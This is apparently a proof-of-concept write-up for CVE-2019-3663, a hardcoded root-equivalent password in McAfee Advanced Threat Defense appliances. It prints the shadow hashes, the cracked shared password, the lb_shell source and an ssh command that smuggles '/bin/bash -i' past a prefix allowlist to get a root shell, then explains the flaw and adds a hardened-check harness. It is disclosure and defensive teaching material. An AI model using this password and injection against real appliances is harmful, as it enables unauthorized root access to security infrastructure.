CVE-2019-3663 PoC — Advanced Threat Defense (ATD) - Unprotected storage of shared credentials vulnerability

Associated Vulnerability
Title: Advanced Threat Defense (ATD) - Unprotected storage of shared credentials vulnerability (CVE-2019-3663)
Description: Unprotected Storage of Credentials vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.8 allows a local attacker to gain access to the root password by accessing sensitive files on the system. This was originally published with a CVSS rating of High; further investigation has resulted in this being updated to Critical. The root password is common across all instances of ATD prior to 4.8. See the security bulletin for further details.
Description
McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password
Readme
# McAfee ATD CVE-2019-3663
* McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password
* Security Bulletin: https://kc.mcafee.com/corporate/index?page=content&id=SB10304

## Interesting shadow entries
```
root:$6$hHb7yjP/$JY9Zf8jFCL966X8rbOqerkuXR86AUMl4bNCuDiEgoXWZEE5dWssWvnokv.54YG4/KRQuNbZBiUWur2/Tj4uUf0:18030:0:99999:7:::
lb:$6$.ewB2mx1KaJArlbX$Bk8y21qhRblgJrlPW68712YqlS/kII6iVxLw849NK/6PAVYLHto1btfL4s.2WVpMNh1tXIwzr/h
```

## Interesting passwd entries
```
root:x:0:0:root:/root:/sbin/nologin
lb:x:0:0::/home/lb:/opt/amas/bin/lb_shell
```

Both accounts are UID 0 / GID 0, so `lb` is root under another name. `root` itself has `/sbin/nologin`, so the only thing confining `lb` is its login shell, `/opt/amas/bin/lb_shell`.

## Cracked hashes
```
$6$hHb7yjP/$JY9Zf8jFCL966X8rbOqerkuXR86AUMl4bNCuDiEgoXWZEE5dWssWvnokv.54YG4/KRQuNbZBiUWur2/Tj4uUf0:validedge
$6$.ewB2mx1KaJArlbX$Bk8y21qhRblgJrlPW68712YqlS/kII6iVxLw849NK/6PAVYLHto1btfL4s.2WVpMNh1tXIwzr/h4WIY60R1xe.:validedge
```

Both hashes crack to the same password, `validedge`, and it is the same on every ATD appliance before the fixed release, so knowing it once is enough to log in as `lb` over SSH on any of them.

## Custom shell of 'lb' user
```
$ cat /opt/amas/bin/lb_shell
#!/bin/bash
# We accept exactly 2 args and in the form:
# -c <command>
if (( $# != 2 )) || [[ "$1" != "-c" ]] ; then
  echo interactive login not permitted
  exit 1
fi
case "$2" in
  # Accept only scp and fileupload commands
  "scp "* | "php /srv/www/htdocs/php/fileupload.php "* | "mv /vedata/"* | "cd /srv/www/htdocs/php/"* | "sleep"* | *"collectPerformanceData.sh "*)
  ;; # continue execution
   * )
   echo that command is not allowed
   exit 1
   ;;
esac
# Execute the command
/bin/bash -c "$2"
# Return with the exit status of the command
exit $?
```

## PoC
```
$ ssh -p 2222 lb@b.b.c.d "sleep 1;/bin/bash -i "
[root@mcafee ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@mcafee ~]#
```
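Two things combine in `lb_shell`. The `case` allowlist is a prefix match: `"sleep"*` accepts any string that starts with `sleep`, and `*"collectPerformanceData.sh "*` accepts any string that merely contains that name. Whatever passes is then handed to `/bin/bash -c`, so a `;`, `&&` or newline in the argument chains a second command that was never inspected, and because `lb` is UID 0 that second command runs as root. The bash script below is an added example, not code from the ATD image or from the original PoC. `lb_shell_allows` re-implements the original allowlist check verbatim as a function so it can be probed offline; `hardened_allows` is a hypothetical replacement showing the shape of a safe restricted shell (reject shell metacharacters, split on whitespace only, exact-match the command word, and in production `exec` the binary by fixed path instead of calling `bash -c`). The command strings are constructed; the first is the exact `-c` argument the PoC's `ssh` command delivers to the remote shell.

```shell
#!/bin/bash
# Added example: offline harness for the lb_shell allowlist, not vendor code.

# Verbatim copy of the original check: returns 0 when lb_shell would pass
# the string to '/bin/bash -c'.  Every alternative is a prefix (or substring)
# glob, so whatever follows the matched prefix is never inspected.
lb_shell_allows() {
  case "$1" in
    "scp "* | "php /srv/www/htdocs/php/fileupload.php "* | "mv /vedata/"* | "cd /srv/www/htdocs/php/"* | "sleep"* | *"collectPerformanceData.sh "*)
      return 0 ;;
    *)
      return 1 ;;
  esac
}

# Hypothetical hardened variant.  The body is a subshell so 'set -f' and
# 'set --' do not leak into the caller.
hardened_allows() (
  cmd=$1
  # Characters that only mean something to a shell.  A restricted shell that
  # execs the binary directly has no legitimate use for any of them.
  meta=';|&$`<>()"'"'"'\'
  nl='
'
  case "$cmd" in
    *["$meta"]* | *"$nl"*) exit 1 ;;
  esac
  # Split on whitespace only; globbing off so '*' and '?' stay literal.
  set -f
  # shellcheck disable=SC2086
  set -- $cmd
  # Exact match on the command word, never a prefix match.  A real shell would
  # replace 'exit 0' with an exec of a fixed absolute path plus the remaining
  # words, so the string never reaches a shell parser.
  case "$1" in
    scp | sleep) exit 0 ;;
  esac
  exit 1
)

# Print a verdict so the two checks can be compared side by side.
lb_shell_verdict() { if lb_shell_allows "$1"; then echo allow; else echo deny; fi; }
hardened_verdict() { if hardened_allows "$1"; then echo allow; else echo deny; fi; }

# Constructed inputs: the first is what the PoC's ssh command delivers.
for c in 'sleep 1;/bin/bash -i' 'scp -t /tmp && id' 'sleepx 1' 'scp -t /tmp' 'sleep 1'; do
  printf '%-24s lb_shell=%s hardened=%s\n' "$c" "$(lb_shell_verdict "$c")" "$(hardened_verdict "$c")"
done
```

Run it locally with `bash` and the first three inputs show the gap: the original allowlist accepts all of them, the hardened check rejects all three while still accepting the two legitimate `scp` and `sleep` invocations. Note that a stricter glob such as `"sleep "*` would not have been a fix on its own; as long as the string is executed through `bash -c`, any metacharacter after the allowed prefix is interpreted.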